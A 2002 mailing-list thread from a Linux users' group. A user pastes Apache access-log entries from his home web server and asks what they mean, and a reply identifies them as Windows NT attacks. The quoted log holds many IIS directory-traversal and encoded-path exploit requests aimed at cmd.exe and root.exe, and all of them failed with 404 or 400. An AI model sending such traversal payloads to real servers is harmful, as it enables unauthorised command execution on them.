access_log
epsas at inflicted.net
epsas at inflicted.net
Mon Jan 28 13:44:26 PST 2002
These are Windows NT attacks, which shouldn't affect you if you run Linux.
Why are the IPs dashed out? "24.--.--.--7" Is that your handiwork?
Good luck,
Charles
On Mon, Jan 28, 2002 at 11:00:59AM -1000, Todd Lee wrote:
> Hey everyone,
>
> I was wondering if anyone out there could help me with understanding my
> access_log for httpd. I was looking through it after setting a new RH7.2
> box with monmotha's firewall script and the latest rpms from RHN. I just
> host my band's website and e-mail. Anyway, I got these entries that I don't
> quite understand. It looks like someone was trying to run something on the
> box, just wondering how to interpret these. I changed the IP...just in case
> I'm wrong and this is totally innocent, hate to give out people IP's
> unnecessarily...
> 24.--.--.--7 - - [28/Jan/2002:05:00:43 -1000] "GET /scripts/root.exe?/c+dir
> HTTP/1.0" 404 317
> 24.--.--.--7 - - [28/Jan/2002:05:01:02 -1000] "GET /MSADC/root.exe?/c+dir
> HTTP/1.0" 404 315
> 24.--.--.--7 - - [28/Jan/2002:05:01:29 -1000] "GET
> /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325
> 24.--.--.--7 - - [28/Jan/2002:05:01:48 -1000] "GET
> /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325
> 24.--.--.--7 - - [28/Jan/2002:05:02:06 -1000] "GET
> /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339
> 24.--.--.--7 - - [28/Jan/2002:05:02:25 -1000] "GET
> /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 356
> 24.--.-.--7 - - [28/Jan/2002:05:02:47 -1000] "GET
> /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 356
> 24.--.-.--7 - - [28/Jan/2002:05:03:27 -1000] "GET
> /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
> stem32/cmd.exe?/c+dir HTTP/1.0" 404 372
> 24.--.--.--7 - - [28/Jan/2002:05:03:46 -1000] "GET
> /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 338
> 24.--.--.--7 - - [28/Jan/2002:05:03:47 -1000] "GET
> /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 338
> 24.--.--.--7 - - [28/Jan/2002:05:04:06 -1000] "GET
> /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 338
> 24.--.--.--7 - - [28/Jan/2002:05:04:27 -1000] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 338
> 24.--.--.--7 - - [28/Jan/2002:05:04:31 -1000] "GET
> /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 322
> 24.--.--.--7 - - [28/Jan/2002:05:04:35 -1000] "GET
> /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 322
> 24.--.--.--7 - - [28/Jan/2002:05:04:54 -1000] "GET
> /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339
> 24.---.--.--7 - - [28/Jan/2002:05:05:12 -1000] "GET
> /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339
>
> Thanks!
> -Todd
>
>
>
>
>
> ---
> You are currently subscribed to luau as: epsas at inflicted.net
> To unsubscribe send a blank email to $subst('Email.Unsub')
More information about the LUAU
mailing list